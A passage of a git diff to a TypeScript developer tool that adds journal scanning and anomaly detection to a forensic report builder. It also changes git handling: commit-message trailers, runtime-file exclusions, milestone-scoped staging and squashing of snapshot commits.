+  // Persist forensics context so follow-up turns can re-inject it (#2941)
+  writeForensicsMarker(basePath, savedPath, content);
 }
 
 // ─── Report Builder ───────────────────────────────────────────────────────────
@@ -150,8 +288,9 @@ export async function buildForensicReport(basePath: string): Promise<ForensicRep
   // 3. Load metrics
   const metrics = loadLedgerFromDisk(basePath);
 
-  // 4. Load completed keys
+  // 4. Load completed keys (legacy) and DB completion counts
   const completedKeys = loadCompletedKeys(basePath);
+  const dbCompletionCounts = getDbCompletionCounts();
 
   // 5. Check crash lock
   const crashLock = readCrashLock(basePath);
@@ -184,7 +323,13 @@ export async function buildForensicReport(basePath: string): Promise<ForensicRep
   // from import.meta.url would resolve to ~/package.json (wrong on every system).
   const gsdVersion = process.env.GSD_VERSION || "unknown";
 
-  // 9. Run anomaly detectors
+  // 9. Scan journal for flow timeline and structured events
+  const journalSummary = scanJournalForForensics(basePath);
+
+  // 10. Gather activity log directory metadata
+  const activityLogMeta = gatherActivityLogMeta(basePath, activeMilestone);
+
+  // 11. Run anomaly detectors
   if (metrics?.units) detectStuckLoops(metrics.units, anomalies);
   if (metrics?.units) detectCostSpikes(metrics.units, anomalies);
   detectTimeouts(unitTraces, anomalies);
@@ -192,6 +337,7 @@ export async function buildForensicReport(basePath: string): Promise<ForensicRep
   detectCrash(crashLock, anomalies);
   detectDoctorIssues(doctorIssues, anomalies);
   detectErrorTraces(unitTraces, anomalies);
+  detectJournalAnomalies(journalSummary, anomalies);
 
   return {
     gsdVersion,
@@ -203,10 +349,13 @@ export async function buildForensicReport(basePath: string): Promise<ForensicRep
     unitTraces,
     metrics,
     completedKeys,
+    dbCompletionCounts,
     crashLock,
     doctorIssues,
     anomalies,
     recentUnits,
+    journalSummary,
+    activityLogMeta,
   };
 }
 
@@ -214,6 +363,9 @@ export async function buildForensicReport(basePath: string): Promise<ForensicRep
 
 const ACTIVITY_FILENAME_RE = /^(\d+)-(.+?)-(.+)\.jsonl$/;
 
+/** Threshold below which iteration cadence is considered rapid (thrashing). */
+const RAPID_ITERATION_THRESHOLD_MS = 5000;
+
 function scanActivityLogs(basePath: string, activeMilestone?: string | null): UnitTrace[] {
   const activityDirs = resolveActivityDirs(basePath, activeMilestone);
   const allTraces: UnitTrace[] = [];
@@ -288,6 +440,154 @@ function resolveActivityDirs(basePath: string, activeMilestone?: string | null):
   return dirs;
 }
 
+// ─── Journal Scanner ──────────────────────────────────────────────────────────
+
+/**
+ * Max recent journal files to fully parse for event counts and recent events.
+ * Older files are line-counted only to avoid loading huge amounts of data.
+ */
+const MAX_JOURNAL_RECENT_FILES = 3;
+
+/** Max recent events to extract for the forensic report timeline. */
+const MAX_JOURNAL_RECENT_EVENTS = 20;
+
+/**
+ * Intelligently scan journal files for forensic summary.
+ *
+ * Journal files can be huge (thousands of JSONL entries over weeks of auto-mode).
+ * Instead of loading all entries into memory:
+ * - Only fully parse the most recent N daily files (event counts, flow tracking)
+ * - Line-count older files for approximate totals (no JSON parsing)
+ * - Extract only the last 20 events for the timeline
+ */
+function scanJournalForForensics(basePath: string): JournalSummary | null {
+  try {
+    const journalDir = join(gsdRoot(basePath), "journal");
+    if (!existsSync(journalDir)) return null;
+
+    const files = readdirSync(journalDir).filter(f => f.endsWith(".jsonl")).sort();
+    if (files.length === 0) return null;
+
+    // Split into recent (fully parsed) and older (line-counted only)
+    const recentFiles = files.slice(-MAX_JOURNAL_RECENT_FILES);
+    const olderFiles = files.slice(0, -MAX_JOURNAL_RECENT_FILES);
+
+    // Line-count older files without parsing — avoids loading megabytes of JSON
+    let olderEntryCount = 0;
+    let oldestEntry: string | null = null;
+    for (const file of olderFiles) {
+      try {
+        const raw = readFileSync(join(journalDir, file), "utf-8");
+        const lines = raw.split("\n");
+        for (const line of lines) {
+          if (!line.trim()) continue;
+          olderEntryCount++;
+          // Extract only the timestamp from the first non-empty line of the oldest file
+          if (!oldestEntry) {
+            try {
+              const parsed = JSON.parse(line) as { ts?: string };
+              if (parsed.ts) oldestEntry = parsed.ts;
+            } catch { /* skip malformed */ }
+          }
+        }
+      } catch { /* skip unreadable files */ }
+    }
+
+    // Fully parse recent files for event counts and timeline
+    const eventCounts: Record<string, number> = {};
+    const flowIds = new Set<string>();
+    const recentParsedEntries: { ts: string; flowId: string; eventType: string; rule?: string; unitId?: string }[] = [];
+    let recentEntryCount = 0;
+
+    for (const file of recentFiles) {
+      try {
+        const raw = readFileSync(join(journalDir, file), "utf-8");
+        for (const line of raw.split("\n")) {
+          if (!line.trim()) continue;
+          try {
+            const entry = JSON.parse(line) as { ts: string; flowId: string; eventType: string; rule?: string; data?: Record<string, unknown> };
+            recentEntryCount++;
+            eventCounts[entry.eventType] = (eventCounts[entry.eventType] ?? 0) + 1;
+            flowIds.add(entry.flowId);
+
+            if (!oldestEntry) oldestEntry = entry.ts;
+
+            // Keep a rolling window of last N events — avoids accumulating unbounded arrays
+            recentParsedEntries.push({
+              ts: entry.ts,
+              flowId: entry.flowId,
+              eventType: entry.eventType,
+              rule: entry.rule,
+              unitId: entry.data?.unitId as string | undefined,
+            });
+            if (recentParsedEntries.length > MAX_JOURNAL_RECENT_EVENTS) {
+              recentParsedEntries.shift();
+            }
+          } catch { /* skip malformed lines */ }
+        }
+      } catch { /* skip unreadable files */ }
+    }
+
+    const totalEntries = olderEntryCount + recentEntryCount;
+    if (totalEntries === 0) return null;
+
+    const newestEntry = recentParsedEntries.length > 0
+      ? recentParsedEntries[recentParsedEntries.length - 1]!.ts
+      : null;
+
+    return {
+      totalEntries,
+      flowCount: flowIds.size,
+      eventCounts,
+      recentEvents: recentParsedEntries,
+      oldestEntry,
+      newestEntry,
+      fileCount: files.length,
+    };
+  } catch {
+    return null;
+  }
+}
+
+// ─── Activity Log Metadata ────────────────────────────────────────────────────
+
+function gatherActivityLogMeta(basePath: string, activeMilestone?: string | null): ActivityLogMeta | null {
+  try {
+    const activityDirs = resolveActivityDirs(basePath, activeMilestone);
+    let fileCount = 0;
+    let totalSizeBytes = 0;
+    let oldestFile: string | null = null;
+    let newestFile: string | null = null;
+    let oldestMtime = Infinity;
+    let newestMtime = 0;
+
+    for (const activityDir of activityDirs) {
+      if (!existsSync(activityDir)) continue;
+      const files = readdirSync(activityDir).filter(f => f.endsWith(".jsonl"));
+      for (const file of files) {
+        const filePath = join(activityDir, file);
+        const stat = statSync(filePath, { throwIfNoEntry: false });
+        if (!stat) continue;
+        fileCount++;
+        totalSizeBytes += stat.size;
+        if (stat.mtimeMs < oldestMtime) {
+          oldestMtime = stat.mtimeMs;
+          oldestFile = file;
+        }
+        if (stat.mtimeMs > newestMtime) {
+          newestMtime = stat.mtimeMs;
+          newestFile = file;
+        }
+      }
+    }
+
+    if (fileCount === 0) return null;
+    return { fileCount, totalSizeBytes, oldestFile, newestFile };
+  } catch {
+    return null;
+  }
+}
+
 // ─── Completed Keys Loader ────────────────────────────────────────────────────
 
 function loadCompletedKeys(basePath: string): string[] {
@@ -300,15 +600,69 @@ function loadCompletedKeys(basePath: string): string[] {
   return [];
 }
 
+// ─── DB Completion Counts ────────────────────────────────────────────────────
+
+function getDbCompletionCounts(): DbCompletionCounts | null {
+  if (!isDbAvailable()) return null;
+
+  const milestones = getAllMilestones();
+  let completedMilestones = 0;
+  let totalSlices = 0;
+  let completedSlices = 0;
+  let totalTasks = 0;
+  let completedTasks = 0;
+
+  for (const m of milestones) {
+    if (isClosedStatus(m.status)) completedMilestones++;
+
+    const slices = getMilestoneSlices(m.id);
+    for (const s of slices) {
+      totalSlices++;
+      if (isClosedStatus(s.status)) completedSlices++;
+
+      const tasks = getSliceTasks(m.id, s.id);
+      for (const t of tasks) {
+        totalTasks++;
+        if (isClosedStatus(t.status)) completedTasks++;
+      }
+    }
+  }
+
+  return {
+    milestones: completedMilestones,
+    milestonesTotal: milestones.length,
+    slices: completedSlices,
+    slicesTotal: totalSlices,
+    tasks: completedTasks,
+    tasksTotal: totalTasks,
+  };
+}
+
 // ─── Anomaly Detectors ───────────────────────────────────────────────────────
 
-function detectStuckLoops(units: UnitMetrics[], anomalies: ForensicAnomaly[]): void {
-  const counts = new Map<string, number>();
+/**
+ * Detect units that were dispatched multiple times (stuck in a loop).
+ *
+ * Counts distinct dispatches by grouping on (type, id, startedAt) first to
+ * collapse idle-watchdog duplicate snapshots (#1943), then counts unique
+ * startedAt values per type/id to determine actual dispatch count.
+ *
+ * Exported for testability.
+ */
+export function detectStuckLoops(units: UnitMetrics[], anomalies: ForensicAnomaly[]): void {
+  // First, collect unique startedAt values per type/id key
+  const dispatchMap = new Map<string, Set<number>>();
   for (const u of units) {
     const key = `${u.type}/${u.id}`;
-    counts.set(key, (counts.get(key) ?? 0) + 1);
+    let starts = dispatchMap.get(key);
+    if (!starts) {
+      starts = new Set();
+      dispatchMap.set(key, starts);
+    }
+    starts.add(u.startedAt);
   }
-  for (const [key, count] of counts) {
+  for (const [key, starts] of dispatchMap) {
+    const count = starts.size;
     if (count > 1) {
       const [unitType, ...idParts] = key.split("/");
       anomalies.push({
@@ -364,15 +718,42 @@ function detectTimeouts(traces: UnitTrace[], anomalies: ForensicAnomaly[]): void
   }
 }
 
+/**
+ * Parse a completed-unit key into its unitType and unitId.
+ *
+ * Hook units use a compound slash-delimited type ("hook/<hookName>"), so a
+ * naive `key.indexOf("/")` would split "hook/telegram-progress/M007/S01" into
+ * unitType="hook" (wrong) instead of "hook/telegram-progress".
+ *
+ * Returns `null` for malformed keys that cannot be split.
+ */
+export function splitCompletedKey(key: string): { unitType: string; unitId: string } | null {
+  if (key.startsWith("hook/")) {
+    // Hook unit types are two segments: "hook/<hookName>/<unitId...>"
+    const secondSlash = key.indexOf("/", 5); // skip past "hook/"
+    if (secondSlash === -1) return null;     // malformed — no unitId after hook name
+    return {
+      unitType: key.slice(0, secondSlash),
+      unitId: key.slice(secondSlash + 1),
+    };
+  }
+
+  const slashIdx = key.indexOf("/");
+  if (slashIdx === -1) return null;
+  return {
+    unitType: key.slice(0, slashIdx),
+    unitId: key.slice(slashIdx + 1),
+  };
+}
+
 function detectMissingArtifacts(completedKeys: string[], basePath: string, activeMilestone: string | null, anomalies: ForensicAnomaly[]): void {
   // Also check the worktree path for artifacts — they may exist there but not at root
   const wtBasePath = activeMilestone ? getAutoWorktreePath(basePath, activeMilestone) : null;
 
   for (const key of completedKeys) {
-    const slashIdx = key.indexOf("/");
-    if (slashIdx === -1) continue;
-    const unitType = key.slice(0, slashIdx);
-    const unitId = key.slice(slashIdx + 1);
+    const parsed = splitCompletedKey(key);
+    if (!parsed) continue;
+    const { unitType, unitId } = parsed;
 
     const rootHasArtifact = verifyExpectedArtifact(unitType, unitId, basePath);
     const wtHasArtifact = wtBasePath ? verifyExpectedArtifact(unitType, unitId, wtBasePath) : false;
@@ -432,6 +813,66 @@ function detectErrorTraces(traces: UnitTrace[], anomalies: ForensicAnomaly[]): v
   }
 }
 
+function detectJournalAnomalies(journal: JournalSummary | null, anomalies: ForensicAnomaly[]): void {
+  if (!journal) return;
+
+  // Detect stuck-detected events from the journal
+  const stuckCount = journal.eventCounts["stuck-detected"] ?? 0;
+  if (stuckCount > 0) {
+    anomalies.push({
+      type: "journal-stuck",
+      severity: stuckCount >= 3 ? "error" : "warning",
+      summary: `Journal recorded ${stuckCount} stuck-detected event(s)`,
+      details: `The auto-mode loop detected it was stuck ${stuckCount} time(s). Check journal events for flow IDs and causal chains to trace the root cause.`,
+    });
+  }
+
+  // Detect guard-block events (dispatch was blocked by a guard)
+  const guardCount = journal.eventCounts["guard-block"] ?? 0;
+  if (guardCount > 0) {
+    anomalies.push({
+      type: "journal-guard-block",
+      severity: guardCount >= 5 ? "warning" : "info",
+      summary: `Journal recorded ${guardCount} guard-block event(s)`,
+      details: `Dispatch was blocked by a guard condition ${guardCount} time(s). This may indicate a persistent blocking condition preventing progress.`,
+    });
+  }
+
+  // Detect rapid iterations (many flows in short time = likely thrashing)
+  if (journal.flowCount > 0 && journal.oldestEntry && journal.newestEntry) {
+    const oldest = new Date(journal.oldestEntry).getTime();
+    const newest = new Date(journal.newestEntry).getTime();
+    const spanMs = newest - oldest;
+    if (spanMs > 0 && journal.flowCount > 10) {
+      const avgMs = spanMs / journal.flowCount;
+      if (avgMs < RAPID_ITERATION_THRESHOLD_MS) {
+        anomalies.push({
+          type: "journal-rapid-iterations",
+          severity: "warning",
+          summary: `${journal.flowCount} iterations in ${formatDuration(spanMs)} (avg ${formatDuration(avgMs)}/iteration)`,
+          details: `Unusually rapid iteration cadence suggests the loop may be thrashing without making progress. Review recent journal events for dispatch-stop or terminal events.`,
+        });
+      }
+    }
+  }
+
+  // Detect worktree failures from journal events
+  const wtCreateFailed = journal.eventCounts["worktree-create-failed"] ?? 0;
+  const wtMergeFailed = journal.eventCounts["worktree-merge-failed"] ?? 0;
+  const wtFailures = wtCreateFailed + wtMergeFailed;
+  if (wtFailures > 0) {
+    const parts: string[] = [];
+    if (wtCreateFailed > 0) parts.push(`${wtCreateFailed} create failure(s)`);
+    if (wtMergeFailed > 0) parts.push(`${wtMergeFailed} merge failure(s)`);
+    anomalies.push({
+      type: "journal-worktree-failure",
+      severity: "warning",
+      summary: `Worktree failures: ${parts.join(", ")}`,
+      details: `Journal recorded worktree operation failures. These may indicate git state corruption or conflicting branches.`,
+    });
+  }
+}
+
 // ─── Report Persistence ───────────────────────────────────────────────────────
 
 function saveForensicReport(basePath: string, report: ForensicReport, problemDescription: string): string {
@@ -508,10 +949,85 @@ function saveForensicReport(basePath: string, report: ForensicReport, problemDes
     sections.push(redact(formatCrashInfo(report.crashLock)), ``);
   }
 
+  // Activity log metadata
+  if (report.activityLogMeta) {
+    const meta = report.activityLogMeta;
+    sections.push(`## Activity Log Metadata`, ``);
+    sections.push(`- Files: ${meta.fileCount}`);
+    sections.push(`- Total size: ${(meta.totalSizeBytes / 1024).toFixed(1)} KB`);
+    if (meta.oldestFile) sections.push(`- Oldest: ${meta.oldestFile}`);
+    if (meta.newestFile) sections.push(`- Newest: ${meta.newestFile}`);
+    sections.push(``);
+  }
+
+  // Journal summary
+  if (report.journalSummary) {
+    const js = report.journalSummary;
+    sections.push(`## Journal Summary`, ``);
+    sections.push(`- Total entries: ${js.totalEntries}`);
+    sections.push(`- Distinct flows (iterations): ${js.flowCount}`);
+    sections.push(`- Daily files: ${js.fileCount}`);
+    if (js.oldestEntry) sections.push(`- Date range: ${js.oldestEntry} — ${js.newestEntry}`);
+    sections.push(``);
+    sections.push(`### Event Type Distribution`, ``);
+    sections.push(`| Event Type | Count |`);
+    sections.push(`|------------|-------|`);
+    for (const [evType, count] of Object.entries(js.eventCounts).sort((a, b) => b[1] - a[1])) {
+      sections.push(`| ${evType} | ${count} |`);
+    }
+    sections.push(``);
+    if (js.recentEvents.length > 0) {
+      sections.push(`### Recent Journal Events (last ${js.recentEvents.length})`, ``);
+      for (const ev of js.recentEvents) {
+        const parts = [`${ev.ts} [${ev.eventType}] flow=${ev.flowId.slice(0, 8)}`];
+        if (ev.rule) parts.push(`rule=${ev.rule}`);
+        if (ev.unitId) parts.push(`unit=${ev.unitId}`);
+        sections.push(`- ${parts.join(" ")}`);
+      }
+      sections.push(``);
+    }
+  }
+
   writeFileSync(filePath, sections.join("\n"), "utf-8");
   return filePath;
 }
 
+// ─── Forensics Session Marker ────────────────────────────────────────────────
+
+export interface ForensicsMarker {
+  reportPath: string;
+  promptContent: string;
+  createdAt: string;
+}
+
+/**
+ * Write a marker file so that buildBeforeAgentStartResult() can re-inject
+ * the forensics prompt on follow-up turns.  (#2941)
+ */
+export function writeForensicsMarker(basePath: string, reportPath: string, promptContent: string): void {
+  const dir = join(gsdRoot(basePath), "runtime");
+  mkdirSync(dir, { recursive: true });
+  const marker: ForensicsMarker = {
+    reportPath,
+    promptContent,
+    createdAt: new Date().toISOString(),
+  };
+  writeFileSync(join(dir, "active-forensics.json"), JSON.stringify(marker), "utf-8");
+}
+
+/**
+ * Read the active forensics marker, or null if none exists.
+ */
+export function readForensicsMarker(basePath: string): ForensicsMarker | null {
+  const markerPath = join(gsdRoot(basePath), "runtime", "active-forensics.json");
+  if (!existsSync(markerPath)) return null;
+  try {
+    return JSON.parse(readFileSync(markerPath, "utf-8")) as ForensicsMarker;
+  } catch {
+    return null;
+  }
+}
+
 // ─── Prompt Formatter ─────────────────────────────────────────────────────────
 
 function formatReportForPrompt(report: ForensicReport): string {
@@ -589,8 +1105,51 @@ function formatReportForPrompt(report: ForensicReport): string {
     sections.push("");
   }
 
-  // Completed keys count
-  sections.push(`### Completed Keys: ${report.completedKeys.length}`);
+  // Activity log metadata
+  if (report.activityLogMeta) {
+    const meta = report.activityLogMeta;
+    sections.push("### Activity Log Overview");
+    sections.push(`- Files: ${meta.fileCount}, Total size: ${(meta.totalSizeBytes / 1024).toFixed(1)} KB`);
+    if (meta.oldestFile) sections.push(`- Oldest: ${meta.oldestFile}`);
+    if (meta.newestFile) sections.push(`- Newest: ${meta.newestFile}`);
+    sections.push("");
+  }
+
+  // Journal summary — structured event timeline
+  if (report.journalSummary) {
+    const js = report.journalSummary;
+    sections.push("### Journal Summary (Iteration Event Log)");
+    sections.push(`- Total entries: ${js.totalEntries}, Distinct flows: ${js.flowCount}, Daily files: ${js.fileCount}`);
+    if (js.oldestEntry) sections.push(`- Date range: ${js.oldestEntry} — ${js.newestEntry}`);
+
+    // Event type distribution (compact)
+    const eventPairs = Object.entries(js.eventCounts).sort((a, b) => b[1] - a[1]);
+    sections.push(`- Events: ${eventPairs.map(([t, c]) => `${t}(${c})`).join(", ")}`);
+
+    // Recent events timeline (for tracing what just happened)
+    if (js.recentEvents.length > 0) {
+      sections.push("");
+      sections.push(`**Recent Journal Events (last ${js.recentEvents.length}):**`);
+      for (const ev of js.recentEvents) {
+        const parts = [`${ev.ts} [${ev.eventType}] flow=${ev.flowId.slice(0, 8)}`];
+        if (ev.rule) parts.push(`rule=${ev.rule}`);
+        if (ev.unitId) parts.push(`unit=${ev.unitId}`);
+        sections.push(`- ${parts.join(" ")}`);
+      }
+    }
+    sections.push("");
+  }
+
+  // Completion status — prefer DB counts, fall back to legacy completed-units.json
+  if (report.dbCompletionCounts) {
+    const c = report.dbCompletionCounts;
+    sections.push(`### Completion Status (from DB)`);
+    sections.push(`- ${c.milestones}/${c.milestonesTotal} milestones complete`);
+    sections.push(`- ${c.slices}/${c.slicesTotal} slices complete`);
+    sections.push(`- ${c.tasks}/${c.tasksTotal} tasks complete`);
+  } else {
+    sections.push(`### Completed Keys: ${report.completedKeys.length}`);
+  }
   sections.push(`### GSD Version: ${report.gsdVersion}`);
   sections.push(`### Active Milestone: ${report.activeMilestone ?? "none"}`);
   sections.push(`### Active Slice: ${report.activeSlice ?? "none"}`);
diff --git a/src/resources/extensions/gsd/git-constants.ts b/src/resources/extensions/gsd/git-constants.ts
index 7213798ca..4925f4271 100644
--- a/src/resources/extensions/gsd/git-constants.ts
+++ b/src/resources/extensions/gsd/git-constants.ts
@@ -8,4 +8,5 @@ export const GIT_NO_PROMPT_ENV = {
   GIT_TERMINAL_PROMPT: "0",
   GIT_ASKPASS: "",
   GIT_SVN_ID: "",
+  LC_ALL: "C", // force English git output so stderr string checks work on all locales (#1997)
 };
diff --git a/src/resources/extensions/gsd/git-service.ts b/src/resources/extensions/gsd/git-service.ts
index 00b4f717f..ae73a0e94 100644
--- a/src/resources/extensions/gsd/git-service.ts
+++ b/src/resources/extensions/gsd/git-service.ts
@@ -9,7 +9,7 @@
  */
 
 import { execFileSync, execSync } from "node:child_process";
-import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs";
+import { existsSync, mkdirSync, readFileSync, readdirSync, writeFileSync } from "node:fs";
 import { join } from "node:path";
 import { gsdRoot } from "./paths.js";
 import { GIT_NO_PROMPT_ENV } from "./git-constants.js";
@@ -18,8 +18,8 @@ import { loadEffectiveGSDPreferences } from "./preferences.js";
 
 import {
   detectWorktreeName,
-  SLICE_BRANCH_RE,
 } from "./worktree.js";
+import { SLICE_BRANCH_RE, QUICK_BRANCH_RE, WORKFLOW_BRANCH_RE } from "./branch-patterns.js";
 import {
   nativeGetCurrentBranch,
   nativeDetectMainBranch,
@@ -32,6 +32,8 @@ import {
   nativeRmCached,
   nativeUpdateRef,
   nativeAddPaths,
+  nativeResetSoft,
+  nativeCommitSubject,
 } from "./native-git-bridge.js";
 import { GSDError, GSD_MERGE_CONFLICT, GSD_GIT_ERROR } from "./errors.js";
 import { getErrorMessage } from "./error-utils.js";
@@ -50,9 +52,9 @@ export interface GitPreferences {
   main_branch?: string;
   merge_strategy?: "squash" | "merge";
   /** Controls auto-mode git isolation strategy.
-   *  - "worktree": (default) creates a milestone worktree for isolated work
+   *  - "worktree": creates a milestone worktree for isolated work
    *  - "branch": works directly in the project root (for submodule-heavy repos)
-   *  - "none": no git isolation — commits land on the user's current branch directly
+   *  - "none": (default) no git isolation — commits land on the user's current branch directly
    */
   isolation?: "worktree" | "branch" | "none";
   /** When false, GSD will not modify .gitignore at all — no baseline patterns
@@ -77,6 +79,11 @@ export interface GitPreferences {
    *  Default: the main branch (from `main_branch` or auto-detected).
    */
   pr_target_branch?: string;
+  /** Whether to squash `gsd snapshot:` commits into the next real autoCommit.
+   *  Enabled by default. Set to false to keep snapshot commits in history
+   *  for forensic inspection.
+   */
+  absorb_snapshot_commits?: boolean;
 }
 
 export const VALID_BRANCH_NAME = /^[a-zA-Z0-9_\-\/.]+$/;
@@ -102,23 +109,25 @@ export interface TaskCommitContext {
 
 /**
  * Build a meaningful conventional commit message from task execution context.
- * Format: `{type}({sliceId}/{taskId}): {description}`
+ * Format: `{type}: {description}` (clean conventional commit — no GSD IDs in subject).
+ *
+ * GSD metadata is placed in a `GSD-Task:` git trailer at the end of the body,
+ * following the same convention as `Signed-off-by:` or `Co-Authored-By:`.
  *
  * The description is the task summary one-liner if available (it describes
  * what was actually built), falling back to the task title (what was planned).
  */
 export function buildTaskCommitMessage(ctx: TaskCommitContext): string {
-  const scope = ctx.taskId; // e.g. "S01/T02" or just "T02"
   const description = ctx.oneLiner || ctx.taskTitle;
   const type = inferCommitType(ctx.taskTitle, ctx.oneLiner);
 
-  // Truncate description to ~72 chars for subject line
-  const maxDescLen = 68 - type.length - scope.length;
+  // Truncate description to ~72 chars for subject line (full budget without scope)
+  const maxDescLen = 70 - type.length;
   const truncated = description.length > maxDescLen
     ? description.slice(0, maxDescLen - 1).trimEnd() + "…"
     : description;
 
-  const subject = `${type}(${scope}): ${truncated}`;
+  const subject = `${type}: ${truncated}`;
 
   // Build body with key files if available
   const bodyParts: string[] = [];
@@ -131,15 +140,14 @@ export function buildTaskCommitMessage(ctx: TaskCommitContext): string {
     bodyParts.push(fileLines);
   }
 
+  // Trailers: GSD-Task first, then Resolves
+  bodyParts.push(`GSD-Task: ${ctx.taskId}`);
+
   if (ctx.issueNumber) {
     bodyParts.push(`Resolves #${ctx.issueNumber}`);
   }
 
-  if (bodyParts.length > 0) {
-    return `${subject}\n\n${bodyParts.join("\n\n")}`;
-  }
-
-  return subject;
+  return `${subject}\n\n${bodyParts.join("\n\n")}`;
 }
 
 /**
@@ -196,6 +204,10 @@ export const RUNTIME_EXCLUSION_PATHS: readonly string[] = [
   ".gsd/completed-units.json",
   ".gsd/STATE.md",
   ".gsd/gsd.db",
+  ".gsd/gsd.db-shm",   // SQLite WAL sidecar — always created alongside gsd.db (#2296)
+  ".gsd/gsd.db-wal",   // SQLite WAL sidecar — always created alongside gsd.db (#2296)
+  ".gsd/journal/",     // daily-rotated JSONL event journal (#2296)
+  ".gsd/doctor-history.jsonl", // doctor run history (#2296)
   ".gsd/DISCUSSION-MANIFEST.json",
 ];
 
@@ -238,14 +250,13 @@ export function readIntegrationBranch(basePath: string, milestoneId: string): st
  *
  * The file is committed immediately so the metadata is persisted in git.
  */
-/** Regex matching GSD quick-task branches: gsd/quick/<num>-<slug> */
-export const QUICK_BRANCH_RE = /^gsd\/quick\//;
+/** Re-export for backward compatibility — canonical definitions in branch-patterns.ts */
+export { QUICK_BRANCH_RE, WORKFLOW_BRANCH_RE } from "./branch-patterns.js";
 
 export function writeIntegrationBranch(
   basePath: string,
   milestoneId: string,
   branch: string,
-  _options?: { commitDocs?: boolean },
 ): void {
   // Don't record slice branches as the integration target
   if (SLICE_BRANCH_RE.test(branch)) return;
@@ -253,6 +264,10 @@ export function writeIntegrationBranch(
   // to their origin branch on completion. Recording one as the integration
   // target causes milestone merges to land on the wrong branch (#1293).
   if (QUICK_BRANCH_RE.test(branch)) return;
+  // Don't record workflow-template branches (hotfix, bugfix, spike, etc.) —
+  // same root cause as quick-task branches (#2498). All templates create
+  // gsd/<templateId>/<slug> branches that are ephemeral.
+  if (WORKFLOW_BRANCH_RE.test(branch)) return;
   // Validate
   if (!VALID_BRANCH_NAME.test(branch)) return;
   // Skip if already recorded with the same branch (idempotent across restarts).
@@ -437,11 +452,6 @@ export class GitServiceImpl {
     this._milestoneId = milestoneId;
   }
 
-  /** Convenience wrapper: run git in this repo's basePath. */
-  private git(args: string[], options: { allowFailure?: boolean; input?: string } = {}): string {
-    return runGit(this.basePath, args, options);
-  }
-
   /**
    * Smart staging: `git add -A` excluding GSD runtime paths via pathspec.
    * Falls back to plain `git add -A` if the exclusion pathspec fails.
@@ -485,6 +495,29 @@ export class GitServiceImpl {
     // If .gsd/ IS in .gitignore (the default for external state projects),
     // git add -A already skips it and the exclusions are harmless no-ops.
     const allExclusions = [...RUNTIME_EXCLUSION_PATHS, ...extraExclusions];
+
+    // ── Parallel worker milestone scope (#1991) ──
+    // When GSD_MILESTONE_LOCK is set, this process is a parallel worker that
+    // must only commit files belonging to its own milestone. Exclude all other
+    // milestone directories from staging to prevent cross-milestone pollution
+    // (e.g., an M033 worker fabricating M032 artifacts in the same commit).
+    const milestoneLock = process.env.GSD_MILESTONE_LOCK;
+    if (milestoneLock) {
+      const msDir = join(gsdRoot(this.basePath), "milestones");
+      if (existsSync(msDir)) {
+        try {
+          const entries = readdirSync(msDir, { withFileTypes: true });
+          for (const entry of entries) {
+            if (entry.isDirectory() && entry.name !== milestoneLock) {
+              allExclusions.push(`.gsd/milestones/${entry.name}/`);
+            }
+          }
+        } catch {
+          // Best-effort — if we can't read the milestones dir, proceed without scoping
+        }
+      }
+    }
+
     nativeAddAllWithExclusions(this.basePath, allExclusions);
   }
 
@@ -535,11 +568,97 @@ export class GitServiceImpl {
 
     const message = taskContext
       ? buildTaskCommitMessage(taskContext)
-      : `chore(${unitId}): auto-commit after ${unitType}`;
+      : `chore: auto-commit after ${unitType}\n\nGSD-Unit: ${unitId}`;
     nativeCommit(this.basePath, message, { allowEmpty: false });
+
+    // Absorb any preceding gsd snapshot commits into this real commit.
+    // Walk backwards from HEAD~1 counting consecutive snapshot subjects,
+    // then soft-reset to before them and re-commit with the same message.
+    this.absorbSnapshotCommits(message);
+
     return message;
   }
 
+  /**
+   * Squash consecutive `gsd snapshot:` commits that sit immediately below
+   * HEAD into the current HEAD commit. This keeps the git history clean
+   * after automated snapshot commits are superseded by real work.
+   *
+   * Guards:
+   * - Opt-in via `absorb_snapshot_commits` preference (default: true).
+   * - Refuses to rewrite commits that have been pushed to the remote
+   *   tracking branch (checks merge-base ancestry).
+   * - Saves HEAD SHA before reset; restores it if the re-commit fails.
+   *
+   * Does nothing if there are no snapshot commits to absorb.
+   */
+  private absorbSnapshotCommits(headMessage: string): void {
+    try {
+      // Opt-in guard — users can disable to keep snapshot commits for forensics
+      if (this.prefs.absorb_snapshot_commits === false) return;
+
+      const GSD_SNAPSHOT_PREFIX = "gsd snapshot:";
+      let count = 0;
+
+      // Walk back from HEAD~1 counting consecutive snapshot commits (cap at 10)
+      for (let i = 1; i <= 10; i++) {
+        const subject = nativeCommitSubject(this.basePath, `HEAD~${i}`);
+        if (!subject.startsWith(GSD_SNAPSHOT_PREFIX)) break;
+        count = i;
+      }
+
+      if (count === 0) return;
+
+      // Guard: don't rewrite history that has been pushed to the remote.
+      // Check whether the newest snapshot commit (HEAD~1) is already
+      // reachable from the remote tracking branch. If it is, the snapshots
+      // have been pushed and must not be squashed via local history rewrite.
+      // (Checking resetTarget instead would false-positive when the remote
+      // is at the pre-snapshot base but the snapshots themselves are local.)
+      const resetTarget = `HEAD~${count + 1}`;
+      try {
+        const branch = nativeGetCurrentBranch(this.basePath);
+        if (branch) {
+          const remoteBranch = `origin/${branch}`;
+          // merge-base --is-ancestor exits 0 if HEAD~1 is ancestor of remote
+          execFileSync("git", ["merge-base", "--is-ancestor", "HEAD~1", remoteBranch], {
+            cwd: this.basePath,
+            stdio: ["ignore", "pipe", "pipe"],
+          });
+          // If we get here, newest snapshot IS reachable from remote — already pushed
+          return;
+        }
+      } catch {
+        // Not an ancestor or remote doesn't exist — safe to proceed
+      }
+
+      // Save HEAD SHA so we can restore if the re-commit fails
+      const savedHead = execFileSync("git", ["rev-parse", "HEAD"], {
+        cwd: this.basePath,
+        stdio: ["ignore", "pipe", "pipe"],
+        encoding: "utf-8",
+      }).trim();
+
+      nativeResetSoft(this.basePath, resetTarget);
+
+      // Re-run smartStage so the same RUNTIME_EXCLUSION_PATHS apply.
+      // Snapshot commits used nativeAddTracked (git add -u) which stages
+      // ALL tracked modifications including .gsd/ state files. Without
+      // re-staging, those .gsd/ changes leak into the absorbed commit.
+      this.smartStage();
+
+      try {
+        nativeCommit(this.basePath, headMessage, { allowEmpty: false });
+      } catch {
+        // Re-commit failed — restore original HEAD to avoid leaving the
+        // repo in a partially-reset state with no commit
+        nativeResetSoft(this.basePath, savedHead);
+      }
+    } catch {
+      // Non-fatal — if squash fails, the commits remain unsquashed
+    }
+  }
+
   // ─── Branch Queries ────────────────────────────────────────────────────
 
   /**
